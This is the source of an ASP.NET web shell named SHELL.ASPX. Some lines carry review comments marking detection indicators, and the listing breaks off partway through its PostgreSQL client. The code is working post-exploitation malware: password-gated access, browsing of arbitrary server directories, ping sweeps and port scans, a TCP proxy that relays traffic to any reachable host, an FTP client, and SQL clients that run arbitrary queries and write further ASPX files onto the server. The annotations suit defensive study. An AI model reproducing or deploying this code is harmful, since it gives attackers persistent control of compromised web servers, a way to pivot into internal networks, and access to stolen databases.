- <%@ Page Language="C#" EnableViewState="false" %>
- <%@ Import Namespace="System.Net.NetworkInformation" %>
- <%@ Import Namespace="System.Web.UI.WebControls" %>
- <%@ Import Namespace="System.Data.SqlClient" %>
- <%@ Import Namespace="System.Net.Sockets" %>
- <%@ Import Namespace="System.Diagnostics" %>
- <%@ Import Namespace="System.Net" %>
- <%@ Import Namespace="System.IO" %>
- <%
- // Password Shell //////////////////////////////////////////////////////////////////////////////////////
- String PASSWORG_SHELL = "lulz4u"; // NOTE(review): access password hard-coded in cleartext; the code that checks it is not visible in this part of the listing. The literal and the misspelled identifier are usable static indicators when hunting for copies of this file.
- ////////////////////////////////////////////////////////////////////////////////////////////////////////
- // Variables: page-level state; most of these strings accumulate HTML fragments built by the sections below
- string MARIA = Path.GetFileName(Request.Path); // file name of this page as requested; reused later as a form action target
- string MainDrive = Path.GetPathRoot(Environment.GetFolderPath(Environment.SpecialFolder.System)); // root of the drive that holds the system folder
- string Output = "";String Folders = ""; // Output: drive buttons; Folders: directory rows
- String Files = ""; String Binaries = ""; String PORTSCAN = ""; // Files: file rows; PORTSCAN: port-scan result table
- String ResultSearchOuput = "<h1>Result Found</h1>"; String OutputFTPBuffer = ""; String querys = ""; // querys: SQL text to execute
- String OutputFTPStatus="";String DirFTP="";String attributesOfFiles="";String SQLView="";String PINGSCAN=""; // SQLView / PINGSCAN: rendered SQL and ping results
- // List Storages: resolve the folder to browse and build one link per ready drive
- string CurrentFolder = Page.MapPath(".") + "/"; // default: the physical directory this page is mapped to
- if (!string.IsNullOrEmpty(Request.QueryString["Directory"]))
- CurrentFolder = Request.QueryString["Directory"] + "/"; // NOTE(review): caller-supplied path is used as-is, with no restriction to the web root; requests carrying ?Directory= are a web-log indicator for this file
- CurrentFolder = CurrentFolder.Replace("\\", "/"); // normalise separators to forward slashes
- CurrentFolder = CurrentFolder.Replace("//", "/"); // collapse doubled slashes
- foreach(DriveInfo curdrive in DriveInfo.GetDrives())
- {
- if (!curdrive.IsReady)
- continue; // drives that are not ready are skipped
- string driveRoot = curdrive.RootDirectory.Name.Replace("\\", ""); // e.g. the root name with its backslash removed
- Output += string.Format("<a href='?Directory={0}' title='{2} Bytes Free'><input type='button' value='{1}'></a> ", HttpUtility.UrlEncode(driveRoot), HttpUtility.HtmlEncode(driveRoot), curdrive.TotalFreeSpace); // one button per drive linking back to this page; the tooltip discloses free space
- }
- // PING Scan: when form field "Range" is set, sends an ICMP echo to 255 addresses that share its first three octets. NOTE(review): ICMP sweeps originating from a web server's worker process are a strong host and network detection signal.
- if(!string.IsNullOrEmpty(Request.Form["Range"])){
- Ping pinger = new Ping();
- int TIMEOUT = Convert.ToInt32(Request.Form["Timeout"]); // per-ping timeout taken straight from the form; not validated here
- PINGSCAN += "<table class='tabla'> <tr> <th scope='col'>IP</th> <th scope='col'>Status</th> </tr>";
- string[] IPRange = Request.Form["Range"].Split('.'); // only elements 0..2 are used below
- for(int index=0;index != 255;index++){ // last octet runs 0..254
- try {
- PingReply reply = pinger.Send(IPRange[0]+"."+IPRange[1]+"."+IPRange[2]+"."+index,TIMEOUT); // synchronous send, performed inside the web request
- bool pingable = false;
- pingable = reply.Status == IPStatus.Success;
- if (pingable == true)
- {
- PINGSCAN += "<tr><td><center>"+IPRange[0]+"."+IPRange[1]+"."+IPRange[2]+"."+index+"</td><td><font color='green'>LIVE</font></td></tr>"; // form-supplied octets are written into the HTML without encoding
- }else{
- PINGSCAN += "<tr><td><center>"+IPRange[0]+"."+IPRange[1]+"."+IPRange[2]+"."+index+"</td><td>DOWN</td></tr>";
- }
- }
- catch (PingException) // only PingException is handled; the address is reported as DOWN
- {
- PINGSCAN += "<tr><td><center>"+IPRange[0]+"."+IPRange[1]+"."+IPRange[2]+"."+index+"</td><td>DOWN</td></tr>";
- }
- }
- PINGSCAN += "</table><script>DivShowAndHidden('PSCAN');</script>"; // DivShowAndHidden is a client-side function not defined in this part of the listing
- }
- // PORT Scan: when form field "IPSCAN" is set, attempts a TCP connection to each comma-separated port in form field "Ports". NOTE(review): connection attempts from the web worker process to many ports on one address are a network detection signal.
- if(!string.IsNullOrEmpty(Request.Form["IPSCAN"])){
- string[] port = Request.Form["Ports"].Split(',');
- PORTSCAN += "<table class='tabla'> <tr> <th scope='col'>Port</th> <th scope='col'>Status</th> </tr>";
- TcpClient socket = new TcpClient();
- IPAddress address = IPAddress.Parse(Request.Form["IPSCAN"]); // the target must parse as an IP address
- socket.SendTimeout = 3000; // milliseconds
- socket.ReceiveTimeout = 3000; // milliseconds
- for(int indexb=0;indexb != port.Length;indexb++){
- try{
- socket.Connect(address, Convert.ToInt32(port[indexb]));
- if(socket.Connected){
- PORTSCAN += "<tr><td><center>"+port[indexb]+"</td><td><font color='green'>LIVE</font></td></tr>"; // the form-supplied port text is written into the HTML without encoding
- }else{
- PORTSCAN += "<tr><td><center>"+port[indexb]+"</td><td>DOWN</td></tr>";
- }
- }catch(Exception e){ // any failure is reported as DOWN; the exception detail is discarded
- PORTSCAN += "<tr><td><center>"+port[indexb]+"</td><td>DOWN</td></tr>";
- }
- }
- PORTSCAN += "<script>DivShowAndHidden('PORTSCAN');</script>";
- }
- // PROXY: when query parameter "REQUEST" is present, opens a TCP connection to Host:Port, sends the Base64-decoded REQUEST value and returns the raw reply. NOTE(review): this makes the web server relay traffic to any host it can reach; GET requests carrying REQUEST=, Host= and Port= together are a web-log indicator.
- if(!string.IsNullOrEmpty(Request.QueryString["REQUEST"])){
- TcpClient socket = new TcpClient();
- IPAddress address = IPAddress.Parse(Request.QueryString["Host"]); // the destination must parse as an IP address
- socket.SendTimeout = 10000; // milliseconds
- socket.ReceiveTimeout = 10000; // milliseconds
- socket.Connect(address, Convert.ToInt32(Request.QueryString["Port"]));
- if(socket.Connected){
- NetworkStream networkStream;
- StreamWriter streamWriter;
- StreamReader streamReader;
- networkStream = socket.GetStream();
- streamReader = new StreamReader(networkStream); // created but not used in the visible code
- streamWriter = new StreamWriter(networkStream);
- byte[] data = Convert.FromBase64String(Request.QueryString["REQUEST"]); // payload arrives Base64-encoded in the URL
- streamWriter.Write(Encoding.UTF8.GetString(data)); // decoded as UTF-8 text before being sent
- streamWriter.Flush();
- byte[] buffer = new byte[32768];
- int read = 0;
- int chunk;
- while ((chunk = networkStream.Read(buffer, read, buffer.Length - read)) > 0) { // read until Read returns 0
- read += chunk;
- if (read != buffer.Length) { continue; } // buffer not yet full: keep reading
- int nextByte = networkStream.ReadByte(); // buffer full: probe for one more byte
- if (nextByte == -1) { break; } // end of stream exactly at the buffer boundary
- byte[] newBuffer = new byte[buffer.Length * 2]; // otherwise double the buffer and keep the probed byte
- Array.Copy(buffer, newBuffer, buffer.Length);
- newBuffer[read] = (byte)nextByte;
- buffer = newBuffer;
- read++;
- }
- byte[] ret = new byte[read];
- Array.Copy(buffer, ret, read); // trim to the number of bytes actually received
- Response.OutputStream.Write(ret, 0, ret.Length); // reply bytes go straight into the HTTP response body
- Response.End(); // response ends here, so no page HTML follows the relayed data
- }
- }
- // FTP Client
- if(!string.IsNullOrEmpty(Request.Form["FTP"])){
- try{
- // List Files in FTP Server
- DirFTP=Request.Form["command"];
- if(!string.IsNullOrEmpty(Request.Form["FolderCurrent"]) & !string.IsNullOrEmpty(DirFTP)){
- DirFTP=Request.Form["FolderCurrent"]+"/"+DirFTP;}
- if(Request.Files["filetoFTP"]==null | Request.Form["action"]=="cd"){
- FtpWebRequest request = (FtpWebRequest)WebRequest.Create("ftp://"+Request.Form["host"]+"/"+DirFTP);
- request.Credentials = new NetworkCredential (Request.Form["user"],Request.Form["pass"]);
- request.Method = WebRequestMethods.Ftp.ListDirectoryDetails;
- FtpWebResponse response = (FtpWebResponse)request.GetResponse();
- Stream responseStream = response.GetResponseStream();
- StreamReader reader = new StreamReader(responseStream);
- OutputFTPBuffer="<table class='tabla'><tr><th scope='col'>Output</th></tr>";
- while (!reader.EndOfStream) {OutputFTPBuffer+="<tr><td>"+reader.ReadLine()+"</td></tr>";}
- OutputFTPStatus="</table><script>DivShowAndHidden('FTP');</script><b><i><form id='FTP' method='POST' enctype='multipart/form-data' ><input type='hidden' name='host' value='"+Request.Form["host"]+"'><input type='hidden' name='user' value='"+Request.Form["user"]+"'><input type='hidden' name='pass' value='"+Request.Form["pass"]+"'><input type='hidden' name='FolderCurrent' value='"+DirFTP+"'><input type='hidden' name='FTP' value='true'> <b>FTP CONSOLE</b> <select name='action'><option value='download'>Download</option><option value='DeleteFileFTP'>Delete File</option><option value='DeleteFileFolder'>Delete Folder</option><option value='cd'>Change Directory</option><option value='newDir'>New Directory</option></select><input type='text' name='command' Width='91%' value=''><input type='file' name='filetoFTP'> <input type='submit' value='Execute'> Command Complete, status "+response.StatusDescription+"</i></b></form>";
- reader.Close();
- response.Close();}
- // Download File to FTP Server
- if(!string.IsNullOrEmpty(Request.Form["command"]) & Request.Form["action"]=="download"){
- int bytesRead = 0;
- byte[] buffer = new byte[2048];
- FtpWebRequest request = (FtpWebRequest)WebRequest.Create("ftp://"+Request.Form["host"]+"/"+DirFTP);
- request.Credentials = new NetworkCredential (Request.Form["user"],Request.Form["pass"]);
- request.Method = WebRequestMethods.Ftp.DownloadFile;
- Stream reader = request.GetResponse().GetResponseStream();
- FileStream fileStream = new FileStream(@CurrentFolder+Request.Form["command"], FileMode.Create);
- while (true){bytesRead = reader.Read(buffer, 0, buffer.Length);if (bytesRead == 0){break;}fileStream.Write(buffer, 0, bytesRead);}fileStream.Close();
- OutputFTPStatus="<br></table><script>DivShowAndHidden('FTP');</script><b><i><form id='FTP' method='POST'><input type='hidden' name='host' value='"+Request.Form["host"]+"'><input type='hidden' name='user' value='"+Request.Form["user"]+"'><input type='hidden' name='pass' value='"+Request.Form["pass"]+"'><input type='hidden' name='FTP' value='true'><input type='hidden' name='FolderCurrent' value='"+DirFTP+"'><input type='hidden' name='pass' value='"+Request.Form["pass"]+"'> <b>FTP CONSOLE</b> <select name='action'><option value='cd'>Change Directory</option></select><input type='text' name='command' Width='91%' value=''><input type='submit' value='Execute'> Command Complete, status, Press Execute (With Empy textArea) for backing to main Directory.</i></b></form>";}
- // Make Folder to FTP Server
- if(!string.IsNullOrEmpty(Request.Form["command"]) & Request.Form["action"]=="newDir"){
- FtpWebRequest request = (FtpWebRequest)WebRequest.Create("ftp://"+Request.Form["host"]+"/"+DirFTP);
- request.Credentials = new NetworkCredential (Request.Form["user"],Request.Form["pass"]);
- request.Method = WebRequestMethods.Ftp.MakeDirectory;
- FtpWebResponse response = (FtpWebResponse)request.GetResponse();
- Stream responseStream = response.GetResponseStream();
- StreamReader reader = new StreamReader(responseStream);
- OutputFTPStatus="<br></table><script>DivShowAndHidden('FTP');</script><b><i><form id='FTP' method='POST'><input type='hidden' name='pass' value='"+Request.Form["pass"]+"'><input type='hidden' name='host' value='"+Request.Form["host"]+"'><input type='hidden' name='user' value='"+Request.Form["user"]+"'><input type='hidden' name='pass' value='"+Request.Form["pass"]+"'><input type='hidden' name='FTP' value='true'> <b>FTP CONSOLE</b> <select name='action'><option value='cd'>Change Directory</option></select><input type='text' name='command' Width='91%' value=''><input type='hidden' name='FolderCurrent' value='"+DirFTP+"'><input type='submit' value='Execute'> Command Complete, status "+response.StatusDescription+" Press Execute (With Empy textArea) for backing to main Directory.</i></b></form>";}
- // Upload File to FTP Server
- if(Request.Files["filetoFTP"]!=null){}
- // Delete File of FTP Server
- if(!string.IsNullOrEmpty(Request.Form["command"]) & Request.Form["action"]=="DeleteFileFTP"){
- FtpWebRequest request = (FtpWebRequest)WebRequest.Create("ftp://"+Request.Form["host"]+"/"+DirFTP);
- request.Credentials = new NetworkCredential (Request.Form["user"],Request.Form["pass"]);
- request.Method = WebRequestMethods.Ftp.DeleteFile;
- FtpWebResponse response = (FtpWebResponse)request.GetResponse();
- OutputFTPStatus="<br></table><script>DivShowAndHidden('FTP');</script><b><i><form id='FTP' method='POST'><input type='hidden' name='pass' value='"+Request.Form["pass"]+"'><input type='hidden' name='host' value='"+Request.Form["host"]+"'><input type='hidden' name='user' value='"+Request.Form["user"]+"'><input type='hidden' name='pass' value='"+Request.Form["pass"]+"'><input type='hidden' name='FTP' value='true'> <b>FTP CONSOLE</b> <select name='action'><option value='cd'>Change Directory</option></select><input type='text' name='command' Width='91%' value=''><input type='submit' value='Execute'> Command Complete, status "+response.StatusDescription+" Press Execute (With Empy textArea) for backing to main Directory.</i></b></form>";
- response.Close();}
- // Delete Folders of FTP Server
- if(!string.IsNullOrEmpty(Request.Form["command"]) & Request.Form["action"]=="DeleteFileFolder"){
- FtpWebRequest request = (FtpWebRequest)WebRequest.Create("ftp://"+Request.Form["host"]+"/"+DirFTP);
- request.Credentials = new NetworkCredential (Request.Form["user"],Request.Form["pass"]);
- request.Method = WebRequestMethods.Ftp.RemoveDirectory;
- FtpWebResponse response = (FtpWebResponse)request.GetResponse();
- OutputFTPStatus="<br></table><script>DivShowAndHidden('FTP');</script><b><i><form id='FTP' method='POST'><input type='hidden' name='pass' value='"+Request.Form["pass"]+"'><input type='hidden' name='host' value='"+Request.Form["host"]+"'><input type='hidden' name='user' value='"+Request.Form["user"]+"'><input type='hidden' name='pass' value='"+Request.Form["pass"]+"'><input type='hidden' name='FTP' value='true'> <b>FTP CONSOLE</b> <select name='action'><option value='cd'>Change Directory</option></select><input type='text' name='command' Width='91%' value=''><input type='submit' value='Execute'> Command Complete, status "+response.StatusDescription+" Press Execute (With Empy textArea) for backing to main Directory.</i></b></form>";
- response.Close();}
- }catch(Exception e){Response.Write("<div class='alert'>SHELL.ASPX Message: "+e.Message+"</div>");}
- }
- // SQL Clients
- if(!string.IsNullOrEmpty(Request.Form["SQLProtocol"]) | !string.IsNullOrEmpty(Request.QueryString["SQLProtocol"])) {
- // For each MySQL Services
- String LOCALHOST= Request.Form["host"] + Request.QueryString["host"];
- String PORT = Request.Form["port"] + Request.QueryString["port"];
- String USERNAME = Request.Form["user"] + Request.QueryString["user"];
- String PASSWORD = Request.Form["pass"] + Request.QueryString["pass"];
- String DATABASE = Request.Form["database"] + Request.QueryString["database"];
- String FILE = Request.Form["filename"] + Request.QueryString["filename"];
- // Ms-Mysql Server: SQL Server client driven entirely by request parameters. NOTE(review): host, user and password travel in form fields and, for the table links built below, in the query string, so they can surface in web server access logs during an investigation.
- if (Request.Form["SQLProtocol"] == "SQLServer" | Request.QueryString["SQLProtocol"] == "SQLServer")
- {
- try
- {
- String TypeOutput = ""; // selects how the result set is rendered: "columns", "Tables" or "Query"
- System.Data.SqlClient.SqlConnection conn;
- string myConnectionString;
- myConnectionString = "Data Source=" + LOCALHOST + ";uid=" + USERNAME + ";" + "pwd=" + PASSWORD + ";Network Library=DBMSSOCN;Initial Catalog=" + DATABASE + ";"; // connection string concatenated from request values; DBMSSOCN selects the TCP/IP network library
- conn = new System.Data.SqlClient.SqlConnection();
- conn.ConnectionString = myConnectionString;
- conn.Open(); // the connection is not closed or disposed in the visible code
- String Action = Request.QueryString["Action"];
- Action += Request.Form["Action"]; // query-string and form values are concatenated
- if (Action == "SelectTable")
- {
- querys = "SELECT * FROM " + Request.QueryString["Value"] + ""; // table name from the query string is concatenated into the SQL text
- TypeOutput = "columns";
- }
- else if (Action == "ListTables")
- {
- querys = "SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%'";
- TypeOutput = "Tables";
- }
- else if (!string.IsNullOrEmpty(Request.Form["queryString"]))
- {
- querys = Request.Form["queryString"]; // caller-supplied SQL text, executed verbatim below
- TypeOutput = "Query";
- }
- else
- {
- querys = "SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%'"; // default action: list tables
- TypeOutput = "Tables";
- }
- System.Data.SqlClient.SqlCommand mycomand = new System.Data.SqlClient.SqlCommand(querys, conn);
- System.Data.SqlClient.SqlDataReader myreader = mycomand.ExecuteReader();
- if (TypeOutput != "Query")
- {
- int CounterColumn = myreader.FieldCount;
- SQLView += "<div class='footTable'><b><h2>Output</h2></b></div><table class='tabla'></tr>";
- for (int i = 0; i < CounterColumn; i++)
- {
- SQLView += "<th scope='col'>" + myreader.GetName(i) + "</th>"; // header row from the column names
- }
- while (myreader.Read())
- {
- String Field = "";
- int dbFields = myreader.FieldCount;
- for (int i = 1; i < dbFields; i++) // starts at column 1; the first cell of the row is emitted separately below
- {
- Field += "<td>" + myreader[i] + "</td>"; // database values are written into the HTML without encoding
- }
- if (TypeOutput == "Tables")
- {
- SQLView += "<tr><td><a href='?SQLProtocol=SQLServer&Action=SelectTable&host="+LOCALHOST+"&user="+USERNAME+"&pass="+PASSWORD+"&database="+DATABASE+"&Value=" + myreader[2] + "' title='Table'>" + myreader[2] + "</td>" + Field + "</tr>"; // each table row links back to this page with the database credentials in the URL
- }
- else
- {
- SQLView += "<tr><td>" + myreader[0] + "</td>" + Field + "</tr>";
- }
- Field = "";
- }
- }
- else
- {
- SQLView += "<div class='footTable'><b><h2>Output</h2></b>";
- while (myreader.Read())
- {
- SQLView += myreader[0].ToString(); // free-form query: only the first column of each row is shown
- }
- SQLView += "</code></div>";
- }
- SQLView += "</table><script>DivShowAndHidden('SQLConnection');</script><form method=POST action=" + MARIA + "><input type=hidden name=SQLProtocol value=SQLServer><input type=hidden name=host value=" + LOCALHOST + "><input type=hidden name=database value=" + DATABASE + "><input type=hidden name=user value=" + USERNAME + "><input type=hidden name=pass value=" + PASSWORD + "><textarea name=queryString style='width:100%;height:45px'></textarea ><input type=submit value=Execute><input type=submit name=action value=ListTables></form>"; // follow-up form posts back to this page and carries the credentials as hidden fields
- }
- catch (Exception e)
- {
- Response.Write("<div class='alert'>"+e.Message+"</div>"); // the exception message is echoed to the response
- }
- }
- // Mysql Client
- if (Request.Form["SQLProtocol"] == "MySQL" | Request.QueryString["SQLProtocol"] == "MySQL")
- {
- try
- {
- String FileCreateMYSQLa = @"<%@ Page Language=""C#"" EnableViewState=""false"" " + "%" + ">";
- String FileCreateMYSQLb = @"<%";
- String FileCreateMYSQLc = @"String query="""";string MARIA = System.IO.Path.GetFileName(Request.Path);String SQLView="""";MySql.Data.MySqlClient.MySqlConnection conn; string myConnectionString; String LOCALHOST=Request.QueryString[""host""]+Request.Form[""host""]; String USERNAME=Request.QueryString[""user""]+Request.Form[""user""]; String PASSWORD=Request.QueryString[""pass""]+Request.Form[""pass""]; String DATABASE = Request.QueryString[""database""]+Request.Form[""database""]; myConnectionString = ""server=""+LOCALHOST+"";uid=""+USERNAME+"";"" + ""pwd=""+PASSWORD+"";database=""+DATABASE+"";""; try {conn = new MySql.Data.MySqlClient.MySqlConnection(); conn.ConnectionString = myConnectionString; conn.Open(); String TypeOutput = """"; String Action = Request.QueryString[""Action""]; Action += Request.Form[""Action""]; if (Action == ""SelectTable"") {query = ""SELECT * FROM `"" + Request.QueryString[""Value""] + ""`""; } else if (Action == ""ListTables"") {query = ""SHOW FULL TABLES FROM ""+Request.Form[""database""]; TypeOutput = ""Tables""; } else if (!string.IsNullOrEmpty(Request.Form[""queryString""])) {query = Request.Form[""queryString""]; TypeOutput = ""Query""; } else {query = ""SHOW FULL TABLES FROM ""+DATABASE; TypeOutput = ""Tables""; } MySql.Data.MySqlClient.MySqlCommand mycomand = new MySql.Data.MySqlClient.MySqlCommand(query, conn); MySql.Data.MySqlClient.MySqlDataReader myreader = mycomand.ExecuteReader(); if (TypeOutput != ""Query"") {int CounterColumn = myreader.FieldCount; SQLView += ""<div class='footTable'><b><h2>Output</h2></b></div><table class='tabla'></tr>""; for (int i = 0; i < CounterColumn; i++) {SQLView += ""<th scope='col'>"" + myreader.GetName(i) + ""</th>""; } while (myreader.Read()) {String Field = "" ""; int dbFields = myreader.FieldCount; for (int i = 1; i < dbFields; i++) {Field += ""<td>"" + myreader[i] + ""</td>""; } if (TypeOutput == ""Tables"") {SQLView += ""<tr><td><a 
href='?SQLProtocol=Mysql&Action=SelectTable&host=""+LOCALHOST+""&user=""+USERNAME+""&pass=""+PASSWORD+""&database=""+DATABASE+""&Value="" + myreader[0] + ""' title='Table'>"" + myreader[0] + ""</td>"" + Field + ""</tr>""; } else {SQLView += ""<tr><td>"" + myreader[0] + ""</td>"" + Field + ""</tr>""; } Field = """"; } } else {SQLView += ""<div class='footTable'><b><h2>MARIA.SHELL > MYsql Client > Output</h2></b>""; while (myreader.Read()) {SQLView += myreader.GetString(0); } SQLView += ""</code></div>""; } SQLView += ""</table><script>DivShowAndHidden('SQLConnection');</script><form method=POST action="" + MARIA + ""><input type=hidden name=SQLProtocol value=Mysql><input type=hidden name=host value="" + LOCALHOST + ""><input type=hidden name=database value="" + DATABASE + ""><input type=hidden name=user value="" + USERNAME + ""><input type=hidden name=pass value="" + PASSWORD + ""><textarea name=queryString style='width:100%;height:45px'></textarea ><input type=submit value=Execute><input type=submit name=action value=ListTables></form>""; } catch (Exception e) {Response.Write(""</table><div class='alert'>SHELL.ASPX Message: "" + e.Message + ""</div>"");}Response.Write(SQLView);";
- String StyleHTML = @"<style type=""text/css""> * {font-family: Arial; font-size: 12px;} body {margin: 0px; background-color: white} pre {font-family: Courier New; background-color: black; margin: 60px;} .alert {color:Black;background-color:yellow; border: 3px solid yellow; font-size: 14px;} .timer {font-size: 22px; background-color: red; color: #FFFFFF; text-align: left;} .boxer {font-size: 15px; text-align: left;} .tabla {width: 100%; border: 3px solid #000;overflow-x:auto} .footTable {width: 100%; border: 3px solid #000;overflow-x:auto} .cmdPromp {background-color: black; color: white;border: 3px solid #000;} h2 {font-size: 14px; background-color: #006600; color: #FFFFFF; padding: 2px; } th {text-align: left; background-color: black; color: white} td {background-color: #d7d7d7;} a:link {background-color: #d7d7d7; color: black} a:visited {background-color: #d7d7d7;} a:hover {background-color: red;} a:active {background-color: #d7d7d7;} </style> ";
- using (System.IO.File.Create(@CurrentFolder + "TEMP~.aspx")) ;
- System.IO.File.WriteAllText(@CurrentFolder + "TEMP~.aspx", FileCreateMYSQLa + FileCreateMYSQLb + FileCreateMYSQLc + "%" + ">" + StyleHTML);
- SQLView = "<script>DivShowAndHidden('SQLConnection')</script><iframe width=100% height=100% scrolling=no seamless=yes src=TEMP~.aspx?host=" + LOCALHOST + "&user=" + USERNAME + "&pass=" + PASSWORD + "&database=" + DATABASE + "></iframe>";
- }
- catch (Exception e)
- {
- Response.Write("<div class='alert'>" + e.Message + "</div>");
- }
- }
- // SQLite Client
- if (Request.Form["SQLProtocol"] == "SQLite" | Request.QueryString["Postgresql"] == "SQLite")
- {
- try
- {
- String FileCreateSQLitea = @"<%@ Page Language=""C#"" EnableViewState=""false"" " + "%" + ">";
- String FileCreateSQLiteb = @"<%";
- String FileCreateSQLitec = @"try{String SQLView = """"; String TypeOutput = """"; String querys = """"; string myConnectionString; String LOCALHOST = Request.Form[""host""] + Request.QueryString[""host""]; String USERNAME = Request.Form[""user""] + Request.QueryString[""user""]; String PASSWORD = Request.Form[""pass""] + Request.QueryString[""pass""]; String DATABASE = Request.Form[""database""] + Request.QueryString[""database""]; string MARIA = System.IO.Path.GetFileName(Request.Path); string FILE = Request.Form[""filename""] + Request.QueryString[""filename""]; myConnectionString = ""Data Source=""+FILE; System.Data.SQLite.SQLiteConnection conn; conn = new System.Data.SQLite.SQLiteConnection(); conn.ConnectionString = myConnectionString; conn.Open(); String Action = Request.QueryString[""Action""]; Action += Request.Form[""Action""]; if (Action == ""SelectTable"") {querys = ""SELECT * FROM "" + Request.QueryString[""Value""] + """"; TypeOutput = ""columns""; } else if (Action == ""ListTables"") {querys = ""SELECT name FROM sqlite_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%' UNION ALL SELECT name FROM sqlite_temp_master WHERE type IN ('table','view') ORDER BY 1""; TypeOutput = ""Tables""; } else if (!string.IsNullOrEmpty(Request.Form[""queryString""])) {querys = Request.Form[""queryString""]; TypeOutput = ""Query""; } else {querys = ""SELECT name FROM sqlite_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%' UNION ALL SELECT name FROM sqlite_temp_master WHERE type IN ('table','view') ORDER BY 1""; TypeOutput = ""Tables""; } System.Data.SQLite.SQLiteCommand mycomand = new System.Data.SQLite.SQLiteCommand(querys, conn); System.Data.SQLite.SQLiteDataReader myreader = mycomand.ExecuteReader(); if (TypeOutput != ""Query"") {int CounterColumn = myreader.FieldCount; SQLView += ""<div class='footTable'><b><h2>Output</h2></b></div><table class='tabla'></tr>""; for (int i = 0; i < CounterColumn; i++) {SQLView += ""<th scope='col'>"" 
+ myreader.GetName(i) + ""</th>""; } while (myreader.Read()) {String Field = """"; int dbFields = myreader.FieldCount; for (int i = 1; i < dbFields; i++) {Field += ""<td>"" + myreader[i] + ""</td>""; } if (TypeOutput == ""Tables"") {SQLView += ""<tr><td><a href='?SQLProtocol=SQLite&Action=SelectTable&filename=""+FILE+""&host=""+LOCALHOST+""&user=""+USERNAME+""&pass=""+PASSWORD+""&database=""+DATABASE+""&Value="" + myreader[0] + ""' title='Table'>"" + myreader[0] + ""</td>"" + Field + ""</tr>""; } else {SQLView += ""<tr><td>"" + myreader[0] + ""</td>"" + Field + ""</tr>""; } Field = """"; } } else {SQLView += ""<div class='footTable'><b><h2>MARIA.SHELL > SQLite Client > Output</h2></b>""; while (myreader.Read()) {SQLView += myreader.GetString(0); } SQLView += ""</code></div>""; } SQLView += ""</table><script>DivShowAndHidden('SQLConnection');</script><form method=POST action="" + MARIA + ""><input type=hidden name=SQLProtocol value=SQLite><input type=hidden name=filename value="" + FILE + ""><input type=hidden name=host value="" + LOCALHOST + ""><input type=hidden name=database value="" + DATABASE + ""><input type=hidden name=user value="" + USERNAME + ""><input type=hidden name=pass value="" + PASSWORD + ""><textarea name=queryString style='width:100%;height:45px'></textarea ><input type=submit value=Execute><input type=submit name=action value=ListTables></form>""; Response.Write(SQLView); } catch (Exception e) {Response.Write(""<div class='alert'>""+e.Message+""</div>""); }";
- String StyleHTML = @"<style type=""text/css""> * {font-family: Arial; font-size: 12px;} body {margin: 0px; background-color: white} pre {font-family: Courier New; background-color: black; margin: 60px;} .alert {color:Black;background-color:yellow; border: 3px solid yellow; font-size: 14px;} .timer {font-size: 22px; background-color: red; color: #FFFFFF; text-align: left;} .boxer {font-size: 15px; text-align: left;} .tabla {width: 100%; border: 3px solid #000;overflow-x:auto} .footTable {width: 100%; border: 3px solid #000;overflow-x:auto} .cmdPromp {background-color: black; color: white;border: 3px solid #000;} h2 {font-size: 14px; background-color: #006600; color: #FFFFFF; padding: 2px; } th {text-align: left; background-color: black; color: white} td {background-color: #d7d7d7;} a:link {background-color: #d7d7d7; color: black} a:visited {background-color: #d7d7d7;} a:hover {background-color: red;} a:active {background-color: #d7d7d7;} </style> ";
- using (System.IO.File.Create(@CurrentFolder + "TEMP~.aspx")) ;
- System.IO.File.WriteAllText(@CurrentFolder + "TEMP~.aspx", FileCreateSQLitea + FileCreateSQLiteb + FileCreateSQLitec + "%" + ">" + StyleHTML);
- SQLView = "<script>DivShowAndHidden('SQLConnection')</script><iframe width=100% height=100% scrolling=no seamless=yes src=TEMP~.aspx?filename="+FILE+"&host=" + LOCALHOST + "&user=" + USERNAME + "&pass=" + PASSWORD + "&database=" + DATABASE + "></iframe>";
- }
- catch (Exception e)
- {
- Response.Write("<div class='alert'>" + e.Message + "</div>");
- }
- }
- // PostgreSQL Client
- if (Request.Form["SQLProtocol"] == "PostgreSQL" | Request.QueryString["Postgresql"] == "PostgreSQL")
- {
- try
- {
- String FileCreatePostgresSQLa = @"<%@ Page Language=""C#"" EnableViewState=""false"" " + "%" + ">";
- String FileCreatePostgresSQLb = @"<%@ Import Namespace=""System"" " + "%" + ">";
- String FileCreatePostgresSQLc = @"<%@ Import Namespace=""System.Text"" " + "%" + ">";
- String FileCreatePostgresSQLd = @"<%@ Import Namespace=""Npgsql"" " + "%" + ">";
- String FileCreatePostgresSQLe = @"<%@ Import Namespace=""System.Data"" " + "%" + ">";
- String FileCreatePostgresSQLf = @"<%";
- String FileCreatePostgresSQLg = @"string TypeOutput = """"; string SQLView = """"; string querys = """"; String LOCALHOST = Request.Form[""host""] + Request.QueryString[""host""]; String USERNAME = Request.Form[""user""] + Request.QueryString[""user""]; String PASSWORD = Request.Form[""pass""] + Request.QueryString[""pass""]; String DATABASE = Request.Form[""database""] + Request.QueryString[""database""]; string MARIA = System.IO.Path.GetFileName(Request.Path); string conStr = ""Server=""+LOCALHOST+""; User Id=""+USERNAME+""; Password=""+PASSWORD+""; Database=""+DATABASE+"";""; NpgsqlConnection conn = new NpgsqlConnection(conStr); String Action = Request.QueryString[""Action""]; Action += Request.Form[""Action""]; if (Action == ""SelectTable"") {querys = ""SELECT * FROM "" + Request.QueryString[""Value""] + """"; TypeOutput = ""columns""; } else if (Action == ""ListTables"") {querys = ""SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%'""; TypeOutput = ""Tables""; } else if (!string.IsNullOrEmpty(Request.Form[""queryString""])) {querys = Request.Form[""queryString""]; TypeOutput = ""Query""; } else {querys = ""SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE'""; TypeOutput = ""Tables""; } NpgsqlCommand com = new NpgsqlCommand(querys, conn); NpgsqlDataAdapter ad = new NpgsqlDataAdapter(com); DataTable dt = new DataTable(); if(conn != null && conn.State == ConnectionState.Open) {conn.Close(); } else {conn.Open(); } ad.Fill(dt); NpgsqlDataReader dRead = com.ExecuteReader(); try {if (TypeOutput != ""Query"") {int CounterColumn = dRead.FieldCount; SQLView += ""<div class='footTable'><b><h2>Output</h2></b></div><table class='tabla'></tr>""; for (int i = 0; i < CounterColumn; i++) {SQLView += ""<th scope='col'>"" + dRead.GetName(i) + ""</th>""; } while 